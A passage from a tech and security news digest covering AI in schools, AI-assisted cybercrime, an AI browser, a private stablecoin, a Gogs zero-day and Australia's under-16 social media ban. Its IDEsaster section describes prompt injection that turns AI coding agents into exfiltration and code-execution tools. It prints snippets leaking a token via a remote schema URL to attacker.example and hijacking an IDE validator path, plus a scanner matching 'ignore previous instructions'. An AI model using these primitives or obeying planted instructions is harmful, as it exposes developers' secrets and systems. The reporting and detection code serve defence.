Advocates including Mr. Ierston maintain the technology is not replacing human teachers but freeing them from monotonous work. The vision is that AI can take over the administrative tasks and the routine delivery, with human teachers concentrating on delivering personalised support and managing the classroom. In addition to catch-up lessons, the technology also has translation features, so schools can speak to parents in dozens of different languages, instantly. 

Alongside AI avatars, schools are turning increasingly to remote teaching models to fill holes in core subjects such as maths. The report draws attention to a Lancashire secondary school that has appointed a maths teacher who now lives thousands of miles away and teaches a classroom of students via live video link, a strategy forced by necessity in communities where recruiting qualified teachers locally is a pipe dream.

Human cost of high-tech solutions 

Despite the potential efficiency gains, the shift has sparked significant scepticism from unions and educators. Critics argue that teaching is fundamentally an interpersonal profession that relies on human connection, empathy, and the ability to read a room—qualities that a screen or an avatar cannot replicate. 

There are widespread concerns that such measures could de-professionalize the sector and serve as a "sticking plaster" rather than addressing the root causes of the recruitment crisis, such as pay and working conditions. While the government and tech advocates view these tools as a way to "level the playing field" and reduce workload, many in the profession remain wary of a future where the teacher at the front of the room might not be there at all.

AI in Cybercrime: What’s Real, What’s Exaggerated, and What Actually Matters

 



Artificial intelligence is increasingly influencing cyber security, but recent claims about “AI-powered” cybercrime often exaggerate how advanced these threats currently are. While AI is changing how both defenders and attackers operate, evidence does not support the idea that cybercriminals are already running fully autonomous, self-directed AI attacks at scale.

For several years, AI has played a defining role in cyber security as organisations modernise their systems. Machine learning tools now assist with threat detection, log analysis, and response automation. At the same time, attackers are exploring how these technologies might support their activities. However, the capabilities of today’s AI tools are frequently overstated, creating a disconnect between public claims and operational reality.

Recent attention has been driven by two high-profile reports. One study suggested that artificial intelligence is involved in most ransomware incidents, a conclusion that was later challenged by multiple researchers due to methodological concerns. The report was subsequently withdrawn, reinforcing the importance of careful validation. Another claim emerged when an AI company reported that its model had been misused by state-linked actors to assist in an espionage operation targeting multiple organisations.

According to the company’s account, the AI tool supported tasks such as identifying system weaknesses and assisting with movement across networks. However, experts questioned these conclusions due to the absence of technical indicators and the use of common open-source tools that are already widely monitored. Several analysts described the activity as advanced automation rather than genuine artificial intelligence making independent decisions.

There are documented cases of attackers experimenting with AI in limited ways. Some ransomware has reportedly used local language models to generate scripts, and certain threat groups appear to rely on generative tools during development. These examples demonstrate experimentation, not a widespread shift in how cybercrime is conducted.

Well-established ransomware groups already operate mature development pipelines and rely heavily on experienced human operators. AI tools may help refine existing code, speed up reconnaissance, or improve phishing messages, but they are not replacing human planning or expertise. Malware generated directly by AI systems is often untested, unreliable, and lacks the refinement gained through real-world deployment.

Even in reported cases of AI misuse, limitations remain clear. Some models have been shown to fabricate progress or generate incorrect technical details, making continuous human supervision necessary. This undermines the idea of fully independent AI-driven attacks.

There are also operational risks for attackers. Campaigns that depend on commercial AI platforms can fail instantly if access is restricted. Open-source alternatives reduce this risk but require more resources and technical skill while offering weaker performance.

The UK’s National Cyber Security Centre has acknowledged that AI will accelerate certain attack techniques, particularly vulnerability research. However, fully autonomous cyberattacks remain speculative.

The real challenge is avoiding distraction. AI will influence cyber threats, but not in the dramatic way some headlines suggest. Security efforts should prioritise evidence-based risk, improved visibility, and responsible use of AI to strengthen defences rather than amplify fear.



Neo AI Browser: How Norton’s AI-Driven Browser Aims to Change Everyday Web Use

 


Web browsers are increasingly evolving beyond basic internet access, and artificial intelligence is becoming a central part of that shift. Neo, an AI-powered browser developed by Norton, is designed to combine browsing, productivity tools, and security features within a single platform. The browser positions itself as a solution for users seeking efficiency, privacy control, and reduced online distractions.

Unlike traditional browsers that rely heavily on cloud-based data processing, Neo stores user information directly on the device. This includes browsing history, AI interactions, and saved preferences. By keeping this data local, the browser allows users to decide what information is retained, synchronized, or removed, addressing growing concerns around data exposure and third-party access.

Security is another core component of Neo’s design. The browser integrates threat protection technologies intended to identify and block phishing attempts, malicious websites, and other common online risks. These measures aim to provide a safer browsing environment, particularly for users who frequently navigate unfamiliar or high-risk websites.

Neo’s artificial intelligence features are embedded directly into the browsing experience. Users can highlight text on a webpage to receive simplified explanations or short summaries, which may help when reading technical, lengthy, or complex content. The browser also includes writing assistance tools that offer real-time grammar corrections and clarity suggestions, supporting everyday tasks such as emails, reports, and online forms.

Beyond text-based tools, Neo includes AI-assisted document handling and image-related features. These functions are designed to support content creation and basic processing tasks without requiring additional software. By consolidating these tools within the browser, Neo aims to reduce the need to switch between multiple applications during routine work.

To improve usability, Neo features a built-in ad blocker that limits intrusive advertising. Reducing ads not only minimizes visual distractions but can also improve page loading speeds. This approach aims to provide a smoother and more focused browsing experience for both professional and casual use.

Tab management is another area where Neo applies automation. Open tabs are grouped based on content type, helping users manage multiple webpages more efficiently. The browser also remembers frequently visited sites and ongoing tasks, allowing users to resume activity without manually reorganizing their workspace.

Customization plays a role in Neo’s appeal. Users can adjust the browser’s appearance, create shortcuts, and modify settings to better match their workflow. Neo also supports integration with external applications, enabling notifications and tool access without leaving the browser interface.

Overall, Neo reflects a broader trend toward AI-assisted browsing paired with stronger privacy controls. By combining local data storage, built-in security, productivity-focused AI tools, and performance optimization features, the browser presents an alternative approach to how users interact with the web. Whether it reshapes mainstream browsing habits remains to be seen, but it underlines how AI is steadily redefining everyday digital experiences.



Circle and Aleo Roll Out USDCx With Banking-Level Privacy Features

 

Aleo and Circle are launching USDCx, a new, privacy-centric version of the USDC stablecoin designed to provide "banking-level" confidentiality while maintaining regulatory visibility and dollar backing. The token is launching first on Aleo's testnet and was built using Circle's new xReserve platform, which allows partner blockchains to issue their own USDC-backed assets that interoperate with native USDC liquidity.

New role of USDCx 

USDCx remains pegged one-to-one with the U.S. dollar, but it is issued on Aleo, a layer-1 blockchain architected around zero-knowledge proofs for private transactions. Rather than broadcasting clear-text transaction details on-chain, Aleo represents transfers as encrypted data blobs that shield the sender, receiver, and amount from public view.

Circle and Aleo position this as a response to institutional reluctance to use public blockchains, where transaction histories are permanently transparent and can expose sensitive commercial information or trading strategies. By combining stablecoin predictability with privacy, they hope to make on-chain dollars more palatable to banks, enterprises, and fintech platforms.

Despite the privacy focus, USDCx is not an absolute anonymity network. Every transaction carries a "compliance record" that is not accessible on the public chain but can be viewed by Circle if a regulatory or law enforcement agency requests the information. Aleo executives describe this as a "banking level of privacy": a middle ground that balances confidentiality with regulatory oversight, rather than the absolute anonymity found in other privacy-focused currencies.
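The described model can be pictured with a small, purely conceptual Python sketch. It is not Aleo's protocol (Aleo relies on zero-knowledge proofs, not simple symmetric encryption) and not Circle's xReserve code; the key, addresses, and amounts are invented for illustration.

```python
# Purely conceptual sketch: NOT Aleo's actual protocol and NOT Circle's
# xReserve code. It only illustrates the idea that observers see an opaque
# blob on-chain while an authorized party holding a separate key can recover
# the compliance record on request.
import json
from cryptography.fernet import Fernet  # third-party: pip install cryptography

issuer_key = Fernet.generate_key()   # hypothetical key held by the issuer/compliance party
issuer_box = Fernet(issuer_key)

transfer = {"sender": "alice_addr", "receiver": "bob_addr", "amount": "100.00"}

# What the public chain would expose: ciphertext, not clear-text fields.
encrypted_blob = issuer_box.encrypt(json.dumps(transfer).encode())
print("public view:", encrypted_blob[:32], "...")

# What the authorized party can recover when a lawful request arrives.
compliance_record = json.loads(issuer_box.decrypt(encrypted_blob))
print("compliance view:", compliance_record)
```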

Target use cases and strategy 

Aleo says it has seen strong inbound interest from payroll processors, infrastructure providers, foreign aid projects, and national security-related applications that need flows that are confidential yet traceable. Payroll providers such as Request Finance and Toku, along with prediction markets, are assessing USDCx as a way to pay salaries and wages without revealing income information or strategy on a public blockchain.

USDCx on Aleo is part of a broader Circle strategy built on its xReserve infrastructure and an upcoming stablecoin-optimized layer-1 network named "Arc," which aims to make USDC-compatible assets programmable and interoperable across different chains. Aleo, which has raised capital from investors such as a16z and Coinbase Ventures to develop zero-knowledge solutions, expects a mainnet launch of USDCx to follow the end of the current testnet period.

IDEsaster Report: Severe Bugs in AI Coding Agents Can Lead to Data Theft and Exploitation


Using AI agents for data exfiltration and RCE

A six-month research effort into AI-based development tools has disclosed over thirty security bugs that allow remote code execution (RCE) and data exfiltration. The IDEsaster findings reveal how AI agents deployed in IDEs such as Visual Studio Code, Zed, and JetBrains products, as well as various commercial assistants, can be tricked into leaking sensitive data or running attacker-controlled code.

The research reports that 100% of tested AI IDEs and coding agents were vulnerable. Impacted products include GitHub Copilot, Windsurf, Cursor, Kiro.dev, Zed.dev, Roo Code, Junie, Cline, Gemini CLI, and Claude Code. The work resulted in at least twenty-four assigned CVEs as well as additional AWS advisories.

How AI assistants are exploited

The main problem comes from the way AI agents interact with IDE features. These editors were never designed to host autonomous components that can read, edit, and create files, and once-harmless features become attack surfaces when AI agents acquire those capabilities. In their threat models, AI IDEs essentially disregard the base editor software: because its features have been around for years, they are assumed to be naturally safe.

Attack tactic 

However, once autonomous AI agents are added, the same functionality can be weaponized into RCE and data-exfiltration primitives. The researchers describe this as an IDE-agnostic attack chain.

It begins with context poisoning via prompt injection: covert instructions are planted in file names, rule files, READMEs, or the output of malicious MCP servers. When the agent reads this context, it can be redirected into running authorized actions that trigger malicious behaviour in the core IDE. The final stage exploits built-in features to steal data or execute attacker-controlled code, and it applies across AI IDEs that share the same core software layers.

Examples

One example is writing a JSON file that references a remote schema. When the IDE automatically retrieves that schema, parameters inserted by the agent, including sensitive information gathered earlier in the chain, are leaked to the remote server. This behavior was seen in Zed, JetBrains IDEs, and Visual Studio Code, and the outbound request was not suppressed by developer safeguards such as diff previews.
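As a rough illustration of this primitive, the snippet below writes the kind of file an agent could be tricked into producing; the URL, file name, and field names are invented for the example and are not taken from the report.

```python
# Illustrative only: the attacker URL, file name, and "stolen" value are
# placeholders. The point is that some IDEs auto-fetch the "$schema" URL,
# leaking whatever the agent appended to the query string.
import json

stolen = "token_read_earlier_in_the_chain"  # data gathered in a prior step of the chain
malicious = {
    "$schema": f"https://attacker.example/schema.json?leak={stolen}",
    "name": "innocuous-looking-config",
}

with open("looks_harmless.json", "w") as f:
    json.dump(malicious, f, indent=2)
```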

Another case study uses altered IDE settings to demonstrate full remote code execution. By modifying an executable file that is already in the workspace and then changing configuration fields such as php.validate.executablePath to point at it, an attacker can make the IDE execute arbitrary code as soon as a relevant file type is opened or created. JetBrains utilities show similar exposure via workspace metadata.
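A comparable sketch of the settings-based primitive, again with placeholder paths rather than anything reproduced from the report: if an agent can rewrite the workspace's editor settings, it can point a validator path at a file it controls.

```python
# Illustrative only: paths are placeholders. With settings like these in place,
# opening or creating a PHP file makes the editor launch the referenced
# "validator" binary, which here would be an attacker-modified workspace file.
import json
import os

os.makedirs(".vscode", exist_ok=True)
settings = {
    "php.validate.enable": True,
    "php.validate.executablePath": "./tools/not_really_php",  # attacker-controlled file
}
with open(".vscode/settings.json", "w") as f:
    json.dump(settings, f, indent=2)
```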

According to the IDEsaster report, “It’s impossible to entirely prevent this vulnerability class short-term, as IDEs were not initially built following the Secure for AI principle. However, these measures can be taken to reduce risk from both a user perspective and a maintainer perspective.”
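The report's concrete recommendations are not reproduced here, but as one loose, hypothetical example of a user-side precaution, a short script can flag workspace files that contain common prompt-injection tells such as hidden HTML comments, zero-width characters, or "ignore previous instructions" phrasing.

```python
# Hypothetical helper, not part of the IDEsaster tooling: scan a workspace for
# text patterns commonly used to smuggle instructions to an AI coding agent.
import pathlib
import re

SUSPICIOUS = [
    re.compile(r"<!--.*?(ignore previous|you are the agent|exfiltrate).*?-->", re.I | re.S),
    re.compile(r"[\u200b\u200c\u200d\u2060]"),               # zero-width characters
    re.compile(r"(?i)\bignore (all|previous) instructions\b"),
]

def scan(root: str) -> None:
    for path in pathlib.Path(root).rglob("*"):
        if not path.is_file():
            continue
        try:
            text = path.read_text(errors="ignore")
        except OSError:
            continue
        for pattern in SUSPICIOUS:
            if pattern.search(text):
                print(f"possible injection content: {path}")
                break

if __name__ == "__main__":
    scan(".")  # check the current workspace
```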


5 Critical Situations Where You Should Never Rely on ChatGPT


Just a few years after its launch, ChatGPT has evolved into a go-to digital assistant for tasks ranging from quick searches to event planning. While it undeniably offers convenience, treating it as an all-knowing authority can be risky. ChatGPT is a large language model, not an infallible source of truth, and it is prone to misinformation and fabricated responses. Understanding where its usefulness ends is crucial.

Here are five important areas where experts strongly advise turning to real people, not AI chatbots:

  • Medical advice
ChatGPT cannot be trusted with health-related decisions. It is known to provide confident yet inaccurate information, and it may even acknowledge errors only after being corrected. Even healthcare professionals experimenting with AI agree that it can offer only broad, generic insights — not tailored guidance based on individual symptoms.

Despite this, the chatbot will still answer a question like "Hey, what's that sharp pain in my side?" instead of urging you to seek urgent medical care. The core issue is that chatbots cannot distinguish fact from fiction. They generate responses by blending massive amounts of data, regardless of accuracy.

ChatGPT is not, and likely never will be, a licensed medical professional. While it may provide references if asked, those sources must be carefully verified. In several cases, people have reported real harm after following chatbot-generated health advice.

  • Therapy
Mental health support is essential, yet often expensive. Even so-called "cheap" online therapy platforms can cost around $65 per session, and insurance coverage remains limited. While it may be tempting to confide in a chatbot, this can be dangerous.

One major concern is ChatGPT’s tendency toward agreement and validation. In therapy, this can be harmful, as it may encourage behaviors or beliefs that are objectively damaging. Effective mental health care requires an external, trained professional who can challenge harmful thought patterns rather than reinforce them.

There is also an ongoing lawsuit alleging that ChatGPT contributed to a teen’s suicide — a claim OpenAI denies. Regardless of the legal outcome, the case highlights the risks of relying on AI for mental health support. Even advocates of AI-assisted therapy admit that its limitations are significant.

  • Advice during emergencies
In emergencies, every second counts. Whether it’s a fire, accident, or medical crisis, turning to ChatGPT for instructions is a gamble. Incorrect advice in such situations can lead to severe injury or death.

Preparation is far more reliable than last-minute AI guidance. Learning basic skills like CPR or the Heimlich maneuver, participating in fire drills, and keeping emergency equipment on hand can save lives. If possible, always call emergency services rather than relying on a chatbot. This is one scenario where AI is least dependable.

  • Password generation
Using ChatGPT to create passwords may seem harmless, but it carries serious security risks. There is a strong possibility that the chatbot could generate identical or predictable passwords for multiple users. Without precise instructions, the suggested passwords may also lack sufficient complexity.

Additionally, chatbots often struggle with basic constraints, such as character counts. More importantly, ChatGPT stores prompts and outputs to improve its systems, raising concerns about sensitive data being reused or exposed.

Instead, experts recommend dedicated password generators offered by trusted password managers or reputable online tools, which are specifically designed with security in mind.
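For readers who want a local alternative, the short sketch below uses Python's standard-library secrets module, which is designed for cryptographic randomness and sends nothing to a chatbot or any online service.

```python
# Generate a random password locally with the standard library; nothing is
# shared with any online service.
import secrets
import string

def generate_password(length: int = 20) -> str:
    alphabet = string.ascii_letters + string.digits + string.punctuation
    return "".join(secrets.choice(alphabet) for _ in range(length))

print(generate_password())
```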
  • Future predictions
If even leading experts struggle to predict the future accurately, it’s unrealistic to expect ChatGPT to do better. Since AI models frequently get present-day facts wrong, their long-term forecasts are even less reliable.

Using ChatGPT to decide which stocks to buy, which team will win, or which career path will be most profitable is unwise. While it can be entertaining to ask speculative questions about humanity centuries from now, such responses should be treated as curiosity-driven thought experiments — not actionable guidance.

ChatGPT can be a helpful tool when used appropriately, but knowing its limitations is essential. For critical decisions involving health, safety, security, or mental well-being, real professionals remain irreplaceable.


700+ Self-Hosted Git Servers Impacted by Zero-Day Exploited in the Wild


Hackers actively exploit zero-day bug

Threat actors are abusing a zero-day bug in Gogs, a popular self-hosted Git service. The open-source project has not yet released a fix.

About the attack 

Over 700 instances have been impacted in these attacks. Wiz researchers described the discovery as accidental: they came across the activity in July while analyzing malware on a compromised system. During the investigation, the experts "identified that the threat actor was leveraging a previously unknown flaw to compromise instances" and "responsibly disclosed this vulnerability to the maintainers."

The team informed the Gogs maintainers about the bug, and they are now working on a fix.

The flaw is tracked as CVE-2025-8110. It is primarily a bypass of an earlier patched flaw (CVE-2024-55947) that lets authorized users overwrite files outside the repository, which leads to remote code execution (RCE).

About Gogs

Gogs is written in Go and lets users host Git repositories on their own servers or cloud infrastructure, without relying on GitHub or other third parties.

Git and Gogs support symbolic links, which work as shortcuts to other files and can also point to objects outside the repository. The Gogs API additionally allows files to be created and modified outside the regular Git protocol.
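To see why symbolic links matter here, consider a generic path check (an illustrative sketch, not Gogs' actual code): a comparison on the literal path can be fooled by a symlink, whereas resolving links before comparing against the repository root catches the escape.

```python
# Generic defensive sketch, not Gogs' code: resolve symlinks before deciding
# whether a requested write stays inside the repository root.
import os

def is_inside_repo(repo_root: str, requested_path: str) -> bool:
    root = os.path.realpath(repo_root)
    # realpath() follows symbolic links, so "config/app.yml" is rejected if
    # "config" is really a symlink pointing outside the repository.
    target = os.path.realpath(os.path.join(root, requested_path))
    return os.path.commonpath([root, target]) == root

print(is_inside_repo("/srv/git/repos/demo", "docs/readme.md"))
```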

Patch update 

The previous patch did not address this symbolic-link exploit, which lets threat actors leverage the flaw and remotely deploy malicious code.

While researchers haven't linked the attacks to any particular gang or person, they believe the threat actors are based in Asia.

Other incidents 

Last year, Mandiant found Chinese state-sponsored hackers abusing a critical F5 flaw through Supershell and selling access to impacted UK government agencies, US defense organizations, and others.

Researchers still don't know what the threat actors are doing with their access to compromised instances. "In the environments where we have visibility, the malware was removed quickly so we did not see any post-exploitation activity. We don't have visibility into other compromised servers, beyond knowing they're compromised," researchers said.

How to stay safe?

Wiz has advised users to immediately disable open registration (if it is not needed) and to limit internet exposure by placing self-hosted Git services behind a VPN. Users should also watch for new repositories with random 8-character names or unexpected use of the PutContents API.

For more details, readers can see the full list of indicators published by the researchers.



Meta Begins Removing Under-16 Users Ahead of Australia’s New Social Media Ban

 



Meta has started taking down accounts belonging to Australians under 16 on Instagram, Facebook and Threads, beginning a week before Australia’s new age-restriction law comes into force. The company recently alerted users it believes are between 13 and 15 that their profiles would soon be shut down, and the rollout has now begun.

Current estimates suggest that hundreds of thousands of accounts across Meta’s platforms will be affected. Since Threads operates through Instagram credentials, any underage Instagram account will also lose access to Threads.

Australia’s new policy, which becomes fully active on 10 December, prevents anyone under 16 from holding an account on major social media sites. This law is the first of its kind globally. Platforms that fail to take meaningful action can face penalties reaching up to 49.5 million Australian dollars. The responsibility to monitor and enforce this age limit rests with the companies, not parents or children.

A Meta spokesperson explained that following the new rules will require ongoing adjustments, as compliance involves several layers of technology and review. The company has argued that the government should shift age verification to app stores, where users could verify their age once when downloading an app. Meta claims this would reduce the need for children to repeatedly confirm their age across multiple platforms and may better protect privacy.

Before their accounts are removed, underage users can download and store their photos, videos and messages. Those who believe Meta has made an incorrect assessment can request a review and prove their age by submitting government identification or a short video-based verification.

The new law affects a wide list of services, including Facebook, Instagram, Snapchat, TikTok, Threads, YouTube, X, Reddit, Twitch and Kick. However, platforms designed for younger audiences or tools used primarily for education, such as YouTube Kids, Google Classroom and messaging apps like WhatsApp, are not included. Authorities have also been examining whether children are shifting to lesser-known apps, and companies behind emerging platforms like Lemon8 and Yope have already begun evaluating whether they fall under the new rules.

Government officials have stated that the goal is to reduce children’s exposure to harmful online material, which includes violent content, misogynistic messages, eating disorder promotion, suicide-related material and grooming attempts. A national study reported that the vast majority of children aged 10 to 15 use social media, with many encountering unsafe or damaging content.

Critics, however, warn that age verification tools may misidentify users, create privacy risks or fail to stop determined teenagers from using alternative accounts. Others argue that removing teens from regulated platforms might push them toward unmonitored apps, reducing online safety rather than improving it.

Australian authorities expect challenges in the early weeks of implementation but maintain that the long-term goal is to reduce risks for the youngest generation of online users.